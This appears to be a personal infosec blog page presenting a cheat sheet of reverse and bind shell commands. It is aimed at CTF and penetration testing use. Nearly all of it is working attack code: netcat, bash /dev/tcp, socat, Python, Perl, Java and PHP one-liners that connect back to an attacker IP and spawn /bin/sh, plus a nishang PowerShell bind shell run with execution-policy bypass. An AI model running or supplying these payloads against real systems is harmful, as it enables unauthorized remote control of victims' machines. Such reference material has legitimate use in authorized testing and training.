f4d3

f4d3

InfoSec enthusiast | pwn | RE | CTF | BugBounty

Shells Cheat-Sheet

What’s here ?

  • Some essential code snippets. :smile:

General

netcat

Reverse shell:

nc atacker_ip port -e /bin/sh

Bind shell:

nc -lvp port -e 

bash - reverse shell:

bash -i >& /dev/tcp/10.10.10.10/9999 0>&1

socat - reverse shell:

on listener:

socat file:`tty`,raw,echo=0 tcp-listen:9001

on victim:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:9001

python - reverse shell:

One liner:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Same but prettier:

	import socket
	import subprocess
	import os

	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(("10.0.0.1",1234))
	os.dup2(s.fileno(),0)
	os.dup2(s.fileno(),1)
	os.dup2(s.fileno(),2)
	p=subprocess.call(["/bin/sh","-i"])

perl - reverse shell:

perl -e 'use Socket;$i="10.10.10.10";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Same but prettier:

use Socket;
$i="10.0.0.1";
$p=1234;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){
  open(STDIN,">&S");
  open(STDOUT,">&S");
  open(STDERR,">&S");
  exec("/bin/sh -i");
};

Java

r = Runtime.getRuntime()
	p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/9999;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
	p.waitFor()

php - reverse shell

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Powershell (Everything) -

Copy the nishang Invoke-PowerShellTcp.ps1, add the last line as you desire. For example:
For a bind shell:

copy Invoke-PowerShellTcp.ps1 bindtcp.ps1

Add at the end of bindtcp.ps1 :

echo "Invoke-PowerShellTcp -Bind -Port 4444" >> C:\path\to\the\bindtcp.ps1

Execute it !

powershell.exe -exec bypass -f "C:\path\to\the\bindtcp.ps1"

Check the comments inside the nishang .ps1, for more info :smile:

updated_at 07-05-2020